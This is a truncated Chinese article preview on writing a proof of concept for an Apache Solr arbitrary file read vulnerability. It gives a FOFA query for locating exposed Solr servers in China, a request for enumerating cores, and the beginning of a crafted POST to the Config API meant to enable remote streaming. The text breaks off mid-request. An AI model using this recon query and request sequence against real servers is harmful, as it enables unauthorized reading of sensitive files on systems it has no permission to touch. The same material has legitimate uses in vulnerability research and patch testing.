文章预览
本篇主要是针对poc的编写 漏洞介绍 Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件 主要原因:由于未开启身份验证,导致未经身份验证的攻击者可利用Config API打开requestDispatcher.requestParsers.enableRemoteStreaming开关,从而使攻击者可以在未授权的情况下获取目标服务器敏感文件。 影响版本:Apache Solr < = 8.8.1 fofa语法:app="Apache-Solr" & & country="CN" & & status_code="200" 漏洞复现 Solr下载地址:自行下载对应满足版本http://archive.apache.org/dist/lucene/solr/ 第一步、获取core的信息 http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo= false =json 第二步、依据core_name构造config包 POST /solr/demo/config HTTP/1.1 Host: ip:8983 Content-Length: 82 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http:/ip:89833 Content-Type: application/json User-Agent: Mozilla/5.0 (Windo
………………………………